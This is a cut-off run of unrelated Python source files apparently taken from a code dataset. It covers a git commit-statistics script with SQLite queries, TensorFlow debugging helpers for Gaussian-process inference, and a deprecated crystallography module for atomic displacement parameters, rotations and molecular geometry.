        with change_dir(repo) as repo_dir:
            # "org/repo" from the last two path components.
            repo_name = "/".join(repo_dir.split("/")[-2:])
            load_commits(db, repo_name)


if __name__ == "__main__":
    main()
# then:
# gittreeif nedbat/meta/installed python /src/ghorg/commitstats.py /src/ghorg/commits.db
#
# in sqlite:
# select strftime("%Y%W", date, "weekday 0") as yw, count(*) total, sum(conventional) as con from commits group by yw;
# select yw, total, con, cast((con*100.0)/total as integer) pctcon from (select strftime("%Y%W", date, "weekday 0") as yw, count(*) total, sum(conventional) as con from commits group by yw);
"""
select
weekend, total, con, cast((con*100.0)/total as integer) pctcon, bod, cast((bod*100.0)/total as integer) pctbod
from (
select
strftime("%Y%m%d", date, "weekday 0") as weekend,
count(*) total,
sum(conventional) as con, sum(bodylines > 0) as bod
from commits where repo = "edx/edx-platform" group by weekend
)
where weekend > '202009';
"""
|
7,935 | 4758d6efde21e3b5d91f107188f24b6ddf7cbbe4 | import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):
    """Attach debug printing of the ELBO terms to the graph.

    Chains tf.Print ops onto *dummy* so entropy, cross-entropy and the
    expected log-likelihood are printed whenever *dummy* is evaluated, and
    returns the resulting op.  NOTE(review): tf.Print is a TF1-era API
    (removed in TF2) -- confirm the project pins TensorFlow 1.x.
    """
    dummy = tf.Print(dummy, [entropy], 'entropy: ')
    dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
    dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')
    #dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')
    #dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')
    #dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')
    #dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')
    return dummy
def matrix_conditions(session, inference):
    """Print diagnostics for every inducing-point kernel matrix.

    For each latent kernel f_j and each mixing kernel w_ij, evaluates the
    jittered K_zz in *session* and prints its condition number together with
    the kernel hyperparameters (sigma, length scales).  Useful for spotting
    ill-conditioned matrices before a Cholesky failure.
    """
    for j in range(inference.num_latent):
        k_j = inference.kern_f[j]
        K_zz_f = k_j.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
        mat = K_zz_f.eval(session=session)
        cond = np.linalg.cond(mat)
        sigma = k_j.sigma.eval(session=session)
        ls = k_j.length_scales.eval(session=session)
        print('MATRIX CONDITION F('+str(j)+'): ', cond)
        print('SIGMA F('+str(j)+'): ', sigma)
        print('LENGTH_SCALES F('+str(j)+'): ', ls)
        print(mat)
    # Same diagnostics for the (num_outputs x num_latent) mixing kernels.
    for j in range(inference.num_latent):
        for i in range(inference.num_outputs):
            k_ij = inference.kern_w[i][j]
            K_zz_w = k_ij.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
            mat = K_zz_w.eval(session=session)
            cond = np.linalg.cond(mat)
            sigma = k_ij.sigma.eval(session=session)
            ls = k_ij.length_scales.eval(session=session)
            print('MATRIX CONDITION W('+str(i)+','+str(j)+'): ', cond)
            print('SIGMA W('+str(i)+','+str(j)+'): ', sigma)
            print('LENGTH_SCALES W('+str(i)+','+str(j)+'): ', ls)
            print(mat)
7,936 | 27e685750e5caa2f80c5a6399b07435ee9aa9fb9 | """
Created on Feb 10, 2013
@author: jens
Deprecated module for crystallography-related geometry operations, and a lot
of other stuff that I put here.
"""
import numpy as np
# Proton number (Z) keyed by element symbol, H..Kr.
atomtable = {'H': 1, 'He': 2, 'Li': 3, 'Be': 4, 'B': 5, 'C': 6, 'N': 7, 'O': 8,
             'F': 9, 'Ne': 10, 'Na': 11, 'Mg': 12, 'Al': 13, 'Si': 14, 'P': 15,
             'S': 16, 'Cl': 17, 'Ar': 18, 'K': 19, 'Ca': 20, 'Sc': 21, 'Ti': 22,
             'V': 23, 'Cr': 24, 'Mn': 25, 'Fe': 26, 'Co': 27, 'Ni': 28, 'Cu': 29,
             'Zn': 30, 'Ga': 31, 'Ge': 32, 'As': 33, 'Se': 34, 'Br': 35, 'Kr': 36}

# Covalent radii keyed by element symbol (noble gases set to 0).
covalence_radius = {'H': .37, 'He': .0, 'Li': 1.23, 'Be': .90, 'B': .80, 'C': .77,
                    'N': .74, 'O': .71, 'F': .72, 'Ne': 0., 'Na': 1.54, 'Mg': 1.36,
                    'Al': 1.18, 'Si': 1.11, 'P': 1.06, 'S': 1.02, 'Cl': .99, 'Ar': 0.,
                    'K': 2.03, 'Ca': 1.74, 'Sc': 1.44, 'Ti': 1.32, 'V': 1.22,
                    'Cr': 1.18, 'Mn': 1.17, 'Fe': 1.17, 'Co': 1.16, 'Ni': 1.15,
                    'Cu': 1.17, 'Zn': 1.25, 'Ga': 1.26, 'Ge': 1.22, 'As': 1.20,
                    'Se': 1.16, 'Br': 1.14, 'Kr': 0.,
                    'Rb': 2.18}  # , 191, 162, 145, 134, 130, 127, 125, 125, 128, 134, 148, 144, 141, 140, 136, 133, 0, 235, 198, 169, 165, 165, 164, 164, 162, 185, 161, 159, 159, 157, 157, 156, 170, 156, 144, 134, 130, 128, 126, 127, 130, 134, 149, 148, 147, 146, 146, 145, 0, 0, 0, 188, 165, 161, 142, 130, 151, 182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}

# Electronegativities keyed by element symbol.
electro_negativ = {'H': 2.20, 'He': 5.50, 'Li': .97, 'Be': 1.47, 'B': 2.01, 'C': 2.50,
                   'N': 3.07, 'O': 3.50, 'F': 4.40, 'Ne': 4.80, 'Na': 1.01, 'Mg': 1.23,
                   'Al': 1.47, 'Si': 1.74, 'P': 2.06, 'S': 2.44, 'Cl': 2.83, 'Ar': 3.20,
                   'K': .91, 'Ca': 1.04, 'Sc': 1.20, 'Ti': 1.32, 'V': 1.45,
                   'Cr': 1.56, 'Mn': 1.60, 'Fe': 1.64, 'Co': 1.70, 'Ni': 1.75,
                   'Cu': 1.75, 'Zn': 1.66, 'Ga': 1.82, 'Ge': 2.02, 'As': 2.20,
                   'Se': 2.48, 'Br': 2.74, 'Kr': 2.90,
                   'Rb': .89}  # , 99, 111, 122, 123, 130, 136, 142, 145, 130, 142, 146, 149, 172, 182, 201, 221, 240, 86, 97, 108, 108, 107, 107, 107, 107, 110, 111, 110, 110, 110, 111, 111, 106, 114, 123, 133, 140, 146, 152, 155, 142, 142, 144, 144, 155, 167 }

# Zero-padded proton-number strings ('001'..'036') keyed by symbol, H..Kr.
proton_number = {'H': '001', 'He': '002', 'Li': '003', 'Be': '004', 'B': '005', 'C': '006', 'N': '007', 'O': '008',
                 'F': '009', 'Ne': '010', 'Na': '011', 'Mg': '012', 'Al': '013', 'Si': '014', 'P': '015',
                 'S': '016', 'Cl': '017', 'Ar': '018', 'K': '019', 'Ca': '020', 'Sc': '021', 'Ti': '022',
                 'V': '023', 'Cr': '024', 'Mn': '025', 'Fe': '026', 'Co': '027', 'Ni': '028', 'Cu': '029',
                 'Zn': '030', 'Ga': '031', 'Ge': '032', 'As': '033', 'Se': '034', 'Br': '035', 'Kr': '036'}
# Reverse lookup: zero-padded proton-number string -> element symbol.
number_proton = dict([[v, k] for k, v in proton_number.items()])

# Bond-order string -> sort priority (higher = listed first).
priority = {'3': '5',
            '2': '4',
            '1.5': '3',
            '6': '2',
            '5': '1',
            '1': '0'}
def frac2cart(coords, matrix):
    """Transform fractional *coords* to cartesian via the cell *matrix*.

    Expects *matrix* as a numpy matrix; returns a plain list [x, y, z].
    """
    cart = np.dot(matrix, coords)
    return cart.flatten().tolist()[0]
def xd_element(name):
    """Return the element symbol encoded in an atom label.

    Tries the first two characters (two-letter elements such as 'Cl', 'Br');
    falls back to the first character when that is not a known element.
    """
    try:
        symbol = name[:2]
    except:
        symbol = name
    try:
        covalence_radius[symbol]  # known two-letter element?
    except:
        symbol = symbol[0]
    return symbol
def Uiso(adp, mean='geometric'):
    """Equivalent isotropic displacement parameter of an ADP.

    *adp* is a 6-element sequence (U11, U22, U33, U12, U13, U23); *mean*
    selects the geometric or arithmetic mean of the eigenvalues.  Anything
    that cannot be interpreted as an ADP is returned unchanged.
    """
    try:
        eigenvalues = np.linalg.eigvals(get_adp_as_matrix(adp))
        if mean == 'geometric':
            return (abs(eigenvalues[0]) * abs(eigenvalues[1]) * abs(eigenvalues[2])) ** (1. / 3.)
        if mean == 'arithmetic':
            return sum(eigenvalues) / 3.
        print('crystgeom: Error: please specify mean as \'geometric\' or \'arithmetic\'')
        exit()
    except:
        # Bare except kept from the original: also swallows the SystemExit
        # raised by exit() above, so bad *mean* values return adp unchanged.
        return adp


def get_adp_as_matrix(adp):
    """Expand [U11, U22, U33, U12, U13, U23] into a symmetric 3x3 matrix
    (None passes through)."""
    if adp is None:
        return None
    return np.matrix([[adp[0], adp[3], adp[4]],
                      [adp[3], adp[1], adp[5]],
                      [adp[4], adp[5], adp[2]]])
def get_compound_properties(path):
    """
    Reads a *.FChk file and returns a list containing the charge of
    the compound, the number of electrons in the compound, the overall
    length of the dipole moment vector and the total HF energy.
    """
    filepointer = open(path)
    charge = None
    NE = None
    E_HF = None
    dipole = None
    # The dipole vector sits on the line AFTER its "Dipole Moment" header.
    read_dipole = False
    for line in filepointer:
        if read_dipole:
            read_dipole = False
            dipole = [float(value) for value in line.split(' ') if '.' in value]
            dipole = np.linalg.norm(dipole)
        elif 'Charge' in line and not charge:
            charge = line.split(' ')[-1].rstrip('\n')
        elif 'Number of electrons' in line and not NE:
            NE = line.split(' ')[-1].rstrip('\n')
        elif 'Total Energy' in line and not E_HF:
            E_HF = line.split(' ')[-1].rstrip('\n')
        elif 'Dipole Moment' in line and not dipole:
            read_dipole = True
        # Stop scanning once every quantity has been found.
        if charge and NE and E_HF and dipole:
            break
    return [charge, NE, dipole, E_HF]
def center_molecule(atom_coords):
    """Translate the coordinates so their geometric center sits at the origin."""
    centroid = get_geom_center(atom_coords)
    return move_center_to_point(atom_coords, centroid)
def get_pair_list(atom_elements_1, atom_coords_1,
                  atom_elements_2, atom_coords_2):
    """For every atom of set 1, find the closest same-element atom of set 2.

    Returns a list of indices into set 2 (None when no same-element partner
    lies within 9 length units).
    """
    pair_list = []
    # range() instead of the Python-2-only xrange(): valid on both versions.
    for i in range(len(atom_coords_1)):
        best_hit = (9, None)  # (distance, index); 9 acts as a search cutoff
        for j in range(len(atom_coords_2)):
            dist = np.linalg.norm(atom_coords_1[i] - atom_coords_2[j])
            if dist < best_hit[0] and atom_elements_1[i] == atom_elements_2[j]:
                best_hit = (dist, j)
        pair_list.append(best_hit[1])
    return pair_list
def bond_order(bondxi,
               threshold_single_meso=0.0847,
               threshold_meso_double=0.0847,
               threshold_double_triple=0.27):
    """Classify a bond from its Xi parameter as '1', '1.5', '2' or '3'.

    Note: with the default thresholds (single/meso == meso/double) the '1.5'
    class is unreachable; pass a larger threshold_meso_double to enable it.
    """
    if bondxi < threshold_single_meso:
        return '1'
    if bondxi < threshold_meso_double:
        return '1.5'
    if bondxi < threshold_double_triple:
        return '2'
    return '3'
# ===============================================================================
# def rotate_3D_symmetric(atom,source_atom):
# '''
# Rotates the ADP of 'atom' to match the orientation
# of 'source_atom.
# '''
# cosangle=np.dot(atom.orientation[0],source_atom.orientation[0])
# angle=np.arccos(cosangle)
# axis=np.cross(atom.orientation[0],source_atom.orientation[0])
# axis=axis/np.linalg.norm(axis)
# matrix=get_3drotation_matrix(axis,angle)
# orientation0_new=np.dot(source_atom.orientation[0],matrix)
# if np.linalg.norm(orientation0_new-atom.orientation[0])<0.00001:
# pass
# else:
# angle=angle*-1
# matrix=get_3drotation_matrix(axis,angle)
#
# atom.adp['cart_int']=rotate_adp(source_atom.adp['cart_int'],matrix)
#===============================================================================
def rotate_3D(atom, source_atom):
    """
    Rotates the ADP of 'atom' to match the orientation
    of 'source_atom'.

    Builds the transform mapping atom's orientation frame onto
    source_atom's and applies it to source_atom's cartesian ADP, storing
    the result on atom.adp['cart_int'].
    """
    from lauescript.cryst.match import get_transform
    # Both frames share the origin; only the two orientation vectors matter.
    lst2 = [np.array([0, 0, 0]), source_atom.orientation[0], source_atom.orientation[1]]
    lst1 = [np.array([0, 0, 0]), atom.orientation[0], atom.orientation[1]]
    matrix = get_transform(lst1, lst2, matrix=True)
    adp = source_atom.adp['cart_int']
    atom.adp['cart_int'] = rotate_adp(adp, matrix)
def xi(element1, element2, distance):
    """Bond-distinguishing parameter Xi: covalent-radius sum, corrected for
    the electronegativity difference, minus the observed distance."""
    radius_sum = float(covalence_radius[element1]) + float(covalence_radius[element2])
    en_correction = 0.08 * float(abs(electro_negativ[element1] - electro_negativ[element2]))
    return radius_sum - en_correction - distance
def get_orientation_vector(atom1, atom2):
    """Unit vector pointing from *atom2* to *atom1* (cartesian)."""
    diff = atom1.cart - atom2.cart
    return diff / np.linalg.norm(diff)
def framework_crawler(atom, direction, rigid_group_old=None):
    """
    Function to identify atoms belonging to a previously defined rigid
    group.

    Arguments:
        atom: the first atom of the rigid group.
        direction: the second atom of the rigid group.
        rigid_group_old: used by the function itself for recursive calls.

    Returns a list of atoms belonging to the rigid group (only on the
    outermost call; recursive calls mutate the shared list and return None).
    """
    if not rigid_group_old:
        rigid_group = [atom, direction]
    else:
        rigid_group = rigid_group_old
    # Depth-first walk over framework neighbours, skipping hydrogens.
    for atom in get_framework_neighbours(direction):
        if not atom in rigid_group and not atom.element == 'H':
            rigid_group.append(atom)
            framework_crawler(rigid_group[0], atom, rigid_group)
    if not rigid_group_old:
        return rigid_group
def get_closest_atom_of_element(element, atom, exclude=None):
    """First partner of *atom* matching *element* (any element when falsy),
    skipping *exclude*.  Partners are assumed to be distance-sorted; returns
    None when nothing matches."""
    for candidate in atom.partner:
        if (element == candidate.element or not element) and not candidate == exclude:
            return candidate
def get_atom_with_longest_bond(element, atom):
    """Among partners whose name contains *element*, return the last one
    closer than 1.8 length units; scanning stops at the first matching
    partner beyond that distance."""
    hit = None
    for partner in atom.partner:
        if element in partner.name:
            if np.linalg.norm(atom.cart - partner.cart) < 1.8:
                hit = partner
            else:
                break
    return hit
def get_framework_neighbours(atom, useH=True):
    """Return the bonded framework partners of *atom*.

    A partner (among the five nearest) counts as bonded when its distance is
    below the covalent-radius sum plus 0.1; hydrogens are skipped unless
    *useH* is True.
    """
    neighbours = []
    for partner in atom.partner[:5]:
        cutoff = float(covalence_radius[atom.element]) + float(covalence_radius[partner.element]) + .1
        if np.linalg.norm(atom.cart - partner.cart) <= cutoff:
            if useH or not 'H' == partner.element:
                neighbours.append(partner)
    return neighbours
#===============================================================================
# def get_framework_neighbours(atom,useH=True):
# """
# Needs a classes.atom instance as argument.
# Returns the names of the framework atoms bound to that atom.
# """
# neighbourlist=[]
# for atom2 in atom.partner[atom.molecule.name][1:5]:
# #if not 'H(' in atom2.name and np.linalg.norm(atom.cart-atom2.cart)<=1.6:
# if np.linalg.norm(atom.cart-atom2.cart)<=1.6:
# if not 'H(' in atom2.name or useH:
# neighbourlist.append(atom2)
# return neighbourlist
#===============================================================================
def read_meas_adp(data, path='xd.res', use='meas'):
    """
    Reads the measured ADP from the xd.res file.
    The parameters are stored in atom.adp['frac_meas'] and
    atom.adp['cart_meas'] (or the keys derived from *use*).
    """
    use2 = 'frac_' + use
    switch = False
    filepointer = open(path, 'r')
    atomname = None
    for line in filepointer:
        if switch:
            # The line following an atom record carries its six ADP values.
            split = [i for i in line.split(' ') if len(i) > 0]
            if not len(split) == 6:
                print('WARNING!!! Inconsistend number of floats while\
reading measured ADP.')
            data['exp'][atomname].adp[use2] = split
            switch = False
        if '(' in line:
            # An atom label such as "C(1)" opens a new record.
            split = [i for i in line.split(' ') if len(i) > 0]
            if split[0][-1] == ')':
                switch = True
                atomname = split[0]
    use = 'cart_' + use
    # Transform each fractional ADP to the cartesian frame.
    for atom in data['exp'].atoms:
        # if use == 'cart_neut': print(atom)
        atom.adp[use] = rotate_adp2(atom.adp[use2],
                                    atom.molecule.frac2cartmatrix,
                                    atom.molecule.cell)
    return data
def reflect_adp(adp, planev):
    """ADP after reflection through the plane (through the origin) with unit
    normal *planev*."""
    householder = np.identity(4)
    householder[:3, :3] -= 2.0 * np.outer(planev, planev)
    # Translation part is zero for a plane through the origin; kept for shape.
    householder[:3, 3] = (2.0 * np.dot(np.array([0, 0, 0]), planev)) * planev
    return rotate_adp(adp, householder[:3, :3])
def eigenv2tensor(axis):
    """Rebuild the ADP tensor from its principal axes.

    *axis* is a sequence of three eigenvectors, each scaled by its
    eigenvalue; returns the 3x3 tensor whose eigendecomposition they form.
    """
    vec = np.ones((3, 3))
    vecval = np.ones((3, 3))
    # range() instead of the Python-2-only xrange(): valid on both versions.
    for i in range(len(axis)):
        vmag = np.linalg.norm(axis[i])
        v = axis[i] / vmag
        vec[:, i] = v            # unit eigenvector as column i
        vecval[:, i] = axis[i]   # scaled eigenvector as column i
    adp = np.linalg.solve(vec, vecval)
    return adp
def get_adp_from_calc(vx, vy, vz):
    """
    Calculates an ADP in its matrix representation from the three
    principal-axis magnitudes of the displacement ellipsoid.

    The principal directions are fixed to the cartesian axes, so the
    similarity transform V^-1 L V reduces to diag(vx, vy, vz); the full
    transform is kept from the original derivation.
    """
    L = np.matrix([[vx, 0, 0],
                   [0, vy, 0],
                   [0, 0, vz]])
    V = np.matrix([[1, 0, 0],
                   [0, 1, 0],
                   [0, 0, 1]])
    Vinv = np.linalg.inv(V)
    return np.dot(np.dot(Vinv, L), V)
#===============================================================================
#
#
# def get_general_distances(coordlist1,coordlist2,atomlist1,atomlist2):
# """
# Calculates a distance dictionary between two sets of atoms.
# Returns a dictionary entry for every atom in atomlist1 with the inter atom
# distances and the corresponding atom name keyed to their atom type.
#
# This function is used by the get_best_point() function.
# """
# maindict={}
# for i in xrange(len(atomlist1)):
# distdict={}
# for j in xrange(len(atomlist2)):
# if not atomlist2[j][0] in distdict.keys():
# distdict[atomlist2[j][0]]=[[np.linalg.norm(coordlist1[i]-coordlist2[j]),atomlist2[j]]]
# else:
# distdict[atomlist2[j][0]].append([np.linalg.norm(coordlist1[i]-coordlist2[j]),atomlist2[j]])
# ## print atomlist1[i],'aaaaaaaaaaa'
# maindict[atomlist1[i]]=distdict
# return maindict
#===============================================================================
def get_best_quaternion(coordlist1, coordlist2):
    """
    Determines the quaternion representing the best possible
    transformation of two coordinate systems into each other using
    a least-squares approach.

    Returns (quaternion, score): the quaternion is the eigenvector of the
    4x4 key matrix N belonging to its largest eigenvalue, which is also the
    returned score.
    """
    M = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
    # Correlate only as many points as both lists provide.
    number = min(len(coordlist1), len(coordlist2))
    # range() instead of the Python-2-only xrange(): valid on both versions.
    for i in range(number):
        M = M + np.matrix(np.outer(coordlist1[i], coordlist2[i]))
    # Assemble the symmetric 4x4 key matrix from the correlation matrix M.
    N11 = float(M[0][:, 0] + M[1][:, 1] + M[2][:, 2])
    N22 = float(M[0][:, 0] - M[1][:, 1] - M[2][:, 2])
    N33 = float(-M[0][:, 0] + M[1][:, 1] - M[2][:, 2])
    N44 = float(-M[0][:, 0] - M[1][:, 1] + M[2][:, 2])
    N12 = float(M[1][:, 2] - M[2][:, 1])
    N13 = float(M[2][:, 0] - M[0][:, 2])
    N14 = float(M[0][:, 1] - M[1][:, 0])
    N21 = float(N12)
    N23 = float(M[0][:, 1] + M[1][:, 0])
    N24 = float(M[2][:, 0] + M[0][:, 2])
    N31 = float(N13)
    N32 = float(N23)
    N34 = float(M[1][:, 2] + M[2][:, 1])
    N41 = float(N14)
    N42 = float(N24)
    N43 = float(N34)
    N = np.matrix([[N11, N12, N13, N14],
                   [N21, N22, N23, N24],
                   [N31, N32, N33, N34],
                   [N41, N42, N43, N44]])
    values, vectors = np.linalg.eig(N)
    w = list(values)
    # The eigenvector of the largest eigenvalue is the optimal quaternion.
    quat = vectors[:, w.index(max(w))]
    quat = np.array(quat).reshape(-1, ).tolist()
    return quat, max(w)
def get_rotation_matrix_from_quaternion(q):
    """3x3 rotation matrix equivalent to the quaternion q = (w, x, y, z)."""
    w, x, y, z = q[0], q[1], q[2], q[3]
    return np.matrix([[w * w + x * x - y * y - z * z,
                       2 * (x * y - w * z),
                       2 * (x * z + w * y)],
                      [2 * (y * x + w * z),
                       w * w - x * x + y * y - z * z,
                       2 * (y * z - w * x)],
                      [2 * (z * x - w * y),
                       2 * (z * y + w * x),
                       w * w - x * x - y * y + z * z]])
def get_geom_center(coordlist):
    """Geometric center (centroid) of the given coordinate vectors."""
    return sum(coordlist) / len(coordlist)
def move_center_to_point(atomlist, point):
    """Translate every coordinate in *atomlist* by -point, in place, and
    return the (same) list."""
    for idx, coord in enumerate(atomlist):
        atomlist[idx] = coord - point
    return atomlist
def rotate_adp_reverse(adp, rotmat):
    """Rotate the 6-element ADP by *rotmat* using the R * U * R^T convention."""
    U = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
                   [float(adp[3]), float(adp[1]), float(adp[5])],
                   [float(adp[4]), float(adp[5]), float(adp[2])]])
    U = np.dot(np.dot(rotmat, U), np.transpose(rotmat))
    flat = np.array(U).flatten().tolist()
    return [flat[0], flat[4], flat[8], flat[1], flat[2], flat[5]]
def rotate_adp(adp, rotmat):
    """Rotate the 6-element ADP by *rotmat* using the R^T * U * R convention."""
    U = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
                   [float(adp[3]), float(adp[1]), float(adp[5])],
                   [float(adp[4]), float(adp[5]), float(adp[2])]])
    U = np.dot(np.dot(np.transpose(rotmat), U), rotmat)
    flat = np.array(U).flatten().tolist()
    return [flat[0], flat[4], flat[8], flat[1], flat[2], flat[5]]
def rotate_adp2(adp, rotmat, cell):
    """Rotate the fractional 6-element ADP using the inverse of *rotmat*,
    followed by a diagonal cell normalization N = diag(a, b, c)."""
    U = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
                   [float(adp[3]), float(adp[1]), float(adp[5])],
                   [float(adp[4]), float(adp[5]), float(adp[2])]])
    Rinv = np.linalg.inv(rotmat)
    Nmat = np.linalg.inv(np.matrix([[1 / cell[0], 0, 0],
                                    [0, 1 / cell[1], 0],
                                    [0, 0, 1 / cell[2]]]))
    U = np.dot(np.dot(Rinv, U), np.transpose(Rinv))
    U = np.dot(np.dot(Nmat, U), np.transpose(Nmat))
    flat = np.array(U).flatten().tolist()
    return [flat[0], flat[4], flat[8], flat[1], flat[2], flat[5]]
def rotate_adp3(adp, rotmat, cell):
    """Like rotate_adp2 but applies *rotmat* directly (not its inverse),
    followed by the diagonal cell normalization."""
    U = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
                   [float(adp[3]), float(adp[1]), float(adp[5])],
                   [float(adp[4]), float(adp[5]), float(adp[2])]])
    R = np.matrix(rotmat)
    np.linalg.inv(rotmat)  # kept from the original; the result was never used
    Nmat = np.linalg.inv(np.matrix([[1 / cell[0], 0, 0],
                                    [0, 1 / cell[1], 0],
                                    [0, 0, 1 / cell[2]]]))
    U = np.dot(np.dot(R, U), np.transpose(R))
    U = np.dot(np.dot(Nmat, U), np.transpose(Nmat))
    flat = np.array(U).flatten().tolist()
    return [flat[0], flat[4], flat[8], flat[1], flat[2], flat[5]]
def rotate_list_by(coordlist, R):
    """Rotate every coordinate in *coordlist* by the matrix *R*, in place,
    and return the list (each entry becomes a plain Python list)."""
    # range() instead of the Python-2-only xrange(): valid on both versions.
    for idx in range(len(coordlist)):
        rotated = np.dot(R, coordlist[idx])
        coordlist[idx] = np.array(rotated).reshape(-1, ).tolist()
    return coordlist
def write_xyz(coords, name):
    """Dump *coords* to the file *name* in a minimal XYZ-like format
    (atom count, the file name as title, then one 'C' line per coordinate)."""
    with open(name, 'w') as out:
        out.write(str(len(coords)))
        out.write('\n' + name + '\n')
        for position in coords:
            out.write('C ')
            for value in position:
                out.write(str(value) + ' ')
            out.write('\n')
def write_xyzqt(coords, name):
    """Append *coords* to the file *name*: a title line (the file name)
    followed by one 'C' line per coordinate."""
    with open(name, 'a') as out:
        out.write(name + '\n')
        for position in coords:
            out.write('C ')
            for value in position:
                out.write(' ' + str(value))
            out.write('\n')
def get_3drotation_matrix(axis, angle):
    """
    Rotation matrix for a rotation of *angle* radians about *axis*, built
    with the Euler-Rodrigues formula.  Note: normalizes *axis* in place
    when it is a numpy array (kept from the original).
    """
    norm = np.linalg.norm(np.array(axis))
    if norm > 0:
        axis /= norm
    ax, ay, az = axis[0], axis[1], axis[2]
    c, s = np.cos(angle), np.sin(angle)
    return np.array([
        [c + ax * ax * (1 - c), ax * ay * (1 - c) - az * s, ax * az * (1 - c) + ay * s],
        [ay * ax * (1 - c) + az * s, c + ay * ay * (1 - c), ay * az * (1 - c) - ax * s],
        [az * ax * (1 - c) - ay * s, az * ay * (1 - c) + ax * s, c + az * az * (1 - c)]])
def get_normal_vector_of_plane(p1, p2, p3):
    """Unit normal of the plane defined by the three points."""
    edge_a = np.array(p1) - np.array(p2)
    edge_b = np.array(p1) - np.array(p3)
    normal = np.cross(edge_a, edge_b)
    return normal / np.linalg.norm(normal)
def read_gaussian_coords():
    """Parse atom records from a Gaussian 'g98.out' in the working directory.

    Returns a list of [[center_number, atomic_number], xyz-array] entries;
    parsing stops at the 'Distance' section.  Lines that do not parse as
    floats are silently skipped.
    """
    atomlist = []
    filepointer = open('g98.out', 'r')
    for line in filepointer.readlines():
        if 'Distance' in line: break
        try:
            # Columns: center no., atomic no., (type), x, y, z.
            newline = [float(i) for i in line.split(' ') if len(i) > 0]
            newline = [newline[:2], np.array(newline[3:])]
            atomlist.append(newline)
        except:
            pass
    return atomlist
def get_closest_neighbours(atomlist, neighbours=2):
    """
    For every atom return [label, neighbour labels...] for up to *neighbours*
    partners closer than 2.5 length units.

    *atomlist* entries look like [[label, Z], coordinates] (the format
    returned by read_gaussian_coords / frac_to_cart).
    """
    print('atomlist', atomlist)
    neighbourlist = []
    for atom in atomlist:
        listline = [atom[0][0]]
        # Two copies of the distances: one is consumed, one keeps the indices.
        dists = [np.linalg.norm(atom[1] - partner[1]) for partner in atomlist]
        distsc = list(dists)
        dists.remove(min(dists))  # drop the zero self-distance
        for _ in range(neighbours):
            if min(dists) < 2.5:
                listline.append(atomlist[distsc.index(min(dists))][0][0])
                dists.remove(min(dists))
        neighbourlist.append(listline)
    return neighbourlist
def calculate_distance_matrix(atomlist):
    """
    For every atom, collect its distances to all atoms (itself included),
    grouped and sorted by the partner's atomic number (as a string key).
    Returns one dict per atom.
    """
    distlist = []
    for atom in atomlist:
        by_type = {}
        for partner in atomlist:
            key = str(int(partner[0][1]))
            separation = np.linalg.norm(atom[1] - partner[1])
            if key not in by_type:
                by_type[key] = [separation]
            else:
                by_type[key].append(separation)
                by_type[key].sort()
        distlist.append(by_type)
    return distlist
def link_atoms_by_distance(distlist1, atomlist1, distlist2, atomlist2, keys):
    """Match every atom of set 1 to the most similar same-type atom of set 2.

    Similarity is the summed absolute difference of the sorted distance
    spectra (see calculate_distance_matrix); atoms of a different type get a
    prohibitively large penalty.  Returns the list of best-match indices
    into set 2.  (*keys* is unused; kept for interface compatibility.)
    """
    hitlist = []
    for atom in distlist1:
        atomtype = int(atomlist1[distlist1.index(atom)][0][1])
        valuelist = []
        for partner in distlist2:
            partnertype = int(atomlist2[distlist2.index(partner)][0][1])
            if atomtype == partnertype:
                partnervalue = 0
                for key in partner.keys():
                    # range() instead of the Python-2-only xrange().
                    for element in range(len(atom[key])):
                        partnervalue += abs(atom[key][element] - partner[key][element])
            else:
                partnervalue = 9999999
            valuelist.append(partnervalue)
        # Fix: the best match was computed but never returned before.
        hitlist.append(valuelist.index(min(valuelist)))
    return hitlist
def make_list_unique(seq, idfun=None):
    """Return *seq* without duplicates, keeping the first occurrence.

    *idfun* maps an item to the identity used for duplicate detection
    (defaults to the item itself).
    """
    if idfun is None:
        def idfun(x): return x
    seen = {}
    unique = []
    for item in seq:
        marker = idfun(item)
        if marker not in seen:
            seen[marker] = 1
            unique.append(item)
    return unique
def get_influence_atoms(atomlist):
    """
    Determine the atoms defining the chemical environment of every atom by
    checking their bonding partners. Only the first and second neighbours
    are considered.

    Returns one sorted, de-duplicated list of atom names per atom.
    """
    enviromentlist = []
    trunclist = []
    # neighbour lines are [own_name, partner_name, ...] from get_closest_neighbours
    neighbourlist = get_closest_neighbours(atomlist, 4)
    for neighbours in neighbourlist:
        # [0][0] is the first character of the atom name, i.e. the element
        # letter — assumes single-letter element symbols; TODO confirm
        if neighbours[0][0] == "H":
            neighbours = neighbours[:2]  # hydrogen: keep only one bonding partner
        if neighbours[0][0] == "O":
            neighbours = neighbours[:3]  # oxygen: keep at most two partners
        trunclist.append(neighbours)
    for atom in trunclist:
        newatom = []
        # second shell: walk the partners of each first-shell partner
        for atom1partner in atom[1:]:
            for partner in trunclist:
                if partner[0] == atom1partner:
                    # count hydrogens bonded to this partner
                    counter = 0
                    for atomi in partner:
                        if atomi[0] == 'H':
                            counter += 1
                    # include the partner's shell unless it is hydrogen-rich,
                    # except when looking outward from a hydrogen itself
                    if counter < 2 or (partner[0] in atom and atom[0][0] == 'H'):
                        newatom += atom + partner[1:]
        newatom = make_list_unique(newatom)
        newatom.sort()
        enviromentlist.append(newatom)
    return enviromentlist
def link_atoms_by_distance_diff(distlist1, atomlist1, distlist2, atomlist2, keys):
    """
    Identify equivalent atoms in different molecules in different coordinate
    systems, independent of the molecule's orientation.

    Same matching scheme as link_atoms_by_distance: for each atom in
    distlist1, return the index of the same-element atom in distlist2 whose
    per-type sorted distance lists differ the least.
    (`keys` is unused; kept for interface compatibility.)
    """
    hitlist = []
    for atom in distlist1:
        atomtype = int(atomlist1[distlist1.index(atom)][0][1])
        valuelist = []
